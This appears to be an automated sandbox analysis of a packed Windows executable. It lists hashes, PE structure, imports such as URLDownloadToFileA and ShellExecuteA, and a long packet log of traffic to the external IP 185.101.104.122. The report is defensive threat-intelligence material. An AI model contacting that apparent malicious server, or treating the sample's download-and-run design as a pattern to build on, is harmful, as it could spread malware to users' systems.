TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Iyto7FYCJO.exe
File size:	6'070'784 bytes
MD5:	e12627a292cf6a7d32adb932adbd2b3b
SHA1:	2f6bf97cd38104937b7f47be38a00f0cea9a6f4a
SHA256:	eeca777e359e475f4bf1d137bd60dc0194e9520c0047a388ef28d383dc04250e
SHA512:	ba53d23d94fa77f9d1c7eaea2eac71a60ad6dd762760de227de9ae9ac4b26c95a1c951302aa586a19c92c9f89a2e0cb54f4bf44d8a9efd6d7fcde09ba3cedd7d
SSDEEP:	98304:mjtH5k4OJUfCTcdP4w8kwy6zVTs4M2ssUTJPDHQWHEpHuKxdeLkT1Myx:mBZfOCfOcN4w8kwlKIssUTJ7HpCuKxw9
TLSH:	C356226D6284379CC41E84345833ED84B1F6962F0EE999BEB1DB7BC07B9B900DA07B45
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...}T.g.........."....&............$..........@.............................p............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14081b324
Entrypoint Section:	.vmp1
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x670D547D [Mon Oct 14 17:27:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	a849cfe38d82087da8c50afe350476b4

Entrypoint Preview

Instruction
push 21F0900Fh
call 00007F93C8DDD074h
add byte ptr [eax], al
push edi
popad
imul esi, dword ptr [esi+eax*2+6Fh], 6E695372h
insb
dec edi
bound ebp, dword ptr [edx+65h]
arpl word ptr [ebp+eax*2+78h], si
add byte ptr [edi+67h], al
imul ebp, dword ptr [FF267FE6h], 59h
sbb al, ah
outsd
or esi, dword ptr [ecx+07534CEDh]
retn CD68h
out D5h, eax
sti
call 00007F93C8DED3AAh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7efa50	0xc4f	.vmp1
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8de1a8	0x2a8	.vmp1
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa56000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xa4a410	0xa554	.vmp1
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa55000	0xc8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x8bd638	0x30	.vmp1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4a2d0	0x140	.vmp1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x81d000	0x270	.vmp1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb9a40	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xbb000	0x264ea	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe2000	0x1d770	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x100000	0x77f4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x108000	0x1d0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.vmp0	0x109000	0x381b3e	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp1	0x48b000	0x5c9964	0x5c9a00	8e71ad5361e486813b7afbf222ea5e0e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0xa55000	0xc8	0x200	d094dd2c3c9e4a13ab73e8a9225f1362	False	0.333984375	GLS_BINARY_LSB_FIRST	1.9934508857350342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xa56000	0x1e0	0x200	0a2847e95a89a5bd0be24c4b0c296968	False	0.5390625	data	4.772037401703051	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xa56058	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
KERNEL32.dll	WaitForSingleObjectEx
USER32.dll	LoadCursorA
MSVCP140.dll	??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ
d3d9.dll	Direct3DCreate9Ex
dwmapi.dll	DwmExtendFrameIntoClientArea
urlmon.dll	URLDownloadToFileA
CRYPT32.dll	CertFreeCertificateChainEngine
IMM32.dll	ImmReleaseContext
Normaliz.dll	IdnToAscii
WLDAP32.dll
WS2_32.dll	getsockname
RPCRT4.dll	UuidCreate
PSAPI.DLL	GetModuleInformation
USERENV.dll	UnloadUserProfile
VCRUNTIME140_1.dll	__CxxFrameHandler4
VCRUNTIME140.dll	__C_specific_handler
api-ms-win-crt-runtime-l1-1-0.dll	_configure_narrow_argv
api-ms-win-crt-stdio-l1-1-0.dll	_lseeki64
api-ms-win-crt-heap-l1-1-0.dll	realloc
api-ms-win-crt-time-l1-1-0.dll	_gmtime64
api-ms-win-crt-utility-l1-1-0.dll	qsort
api-ms-win-crt-filesystem-l1-1-0.dll	_stat64
api-ms-win-crt-convert-l1-1-0.dll	strtoul
api-ms-win-crt-string-l1-1-0.dll	tolower
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale
api-ms-win-crt-math-l1-1-0.dll	ceilf
ADVAPI32.dll	OpenProcessToken
SHELL32.dll	ShellExecuteA
WTSAPI32.dll	WTSSendMessageW
KERNEL32.dll	GetSystemTimeAsFileTime
USER32.dll	GetUserObjectInformationW
KERNEL32.dll	LocalAlloc, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
USER32.dll	GetProcessWindowStation, GetUserObjectInformationW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 20, 2024 21:15:01.018609047 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:01.024823904 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:01.024960995 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:01.025322914 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:01.032886982 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.424665928 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.424751043 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.424912930 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.424951077 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.424968958 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.425009012 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.425832987 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.425867081 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.425971985 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.426953077 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.426987886 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.427053928 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.427053928 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.428085089 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.428118944 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.428138018 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.428153038 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.428180933 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.428217888 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.431869030 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.431905031 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.431965113 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.431965113 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.577827930 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.577950001 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.578021049 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.578056097 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.578083038 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.578115940 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.582313061 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.582379103 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.583009958 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.583070040 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.583332062 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.583368063 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.583412886 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.583412886 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.587737083 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.587830067 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.587862968 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.587888002 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.588820934 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.588856936 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.588886023 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.588900089 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.589387894 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.589472055 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.592739105 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.592830896 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.593866110 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.593900919 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.593935966 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.593975067 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.594293118 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.594352007 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.597739935 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.597827911 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.597850084 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.597903013 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.598664045 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.598699093 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.598728895 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.598772049 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.599299908 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.599370956 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.602690935 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.602834940 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.603486061 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.603521109 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.603549957 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.603566885 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.603566885 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.603588104 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.727583885 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.727737904 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.727843046 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.727884054 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.727926970 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.727926970 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.728837013 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.728910923 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.729351997 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.729386091 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.729412079 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.729441881 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.730420113 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.730453968 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.730499029 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.730499029 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.731475115 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.731511116 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.731538057 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.731578112 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.732553959 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.732588053 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.732636929 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.732652903 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.733668089 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.733701944 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.733750105 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.733750105 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.734899044 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.734951973 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.734976053 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.734985113 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.735002041 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.735100031 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.736380100 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.736416101 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.736459970 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.736459970 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.737262964 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.737298012 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.737346888 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.737346888 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.738126040 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.738162041 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.738213062 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.738213062 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.739016056 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.739051104 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.739083052 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.739099026 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.739099026 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.739161015 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.739938021 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.739974022 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.740067005 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.740976095 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.741009951 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.741054058 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.741111040 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.742252111 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.742288113 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.742333889 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.742333889 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.743515015 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.743561983 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.743578911 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.743628979 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.744795084 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.744829893 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.744898081 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.744927883 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.744965076 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.745055914 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.746160030 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.746193886 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.746262074 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.746262074 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.747467041 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.747500896 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.747524977 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.747541904 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.751133919 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.751169920 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.751251936 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.751251936 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.751776934 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.751813889 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.751846075 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.751859903 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.751859903 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.751902103 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.755402088 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.755592108 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.877007961 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.877190113 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.877196074 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.877230883 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.877244949 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.877278090 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.877973080 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.878032923 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.878251076 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.878285885 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.878309011 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.878331900 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.879153013 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.879209042 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.879211903 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.879251957 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.880100965 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.880136013 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.880158901 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.880182028 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.881397963 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.881433964 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.881455898 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.881477118 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.881987095 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.882039070 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.882052898 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.882074118 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.882085085 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.882122993 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.882888079 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.882924080 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.882946014 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.882968903 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.883814096 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.883848906 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.883869886 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.883882999 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.883893013 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.883928061 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.884744883 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.884802103 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.884803057 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.884849072 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.885662079 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.885710955 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.885719061 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.885756969 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.886629105 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.886663914 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.886684895 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.886702061 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.887883902 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.887917995 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.887937069 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.887949944 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.887960911 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.887995005 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.888781071 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.888814926 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.888835907 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.888851881 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.889714003 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.889750004 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.889770031 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.889795065 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.890655041 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.890691042 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.890711069 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.890729904 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.891573906 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.891608953 CEST	80	49704	185.101.104.122	192.168.2.5
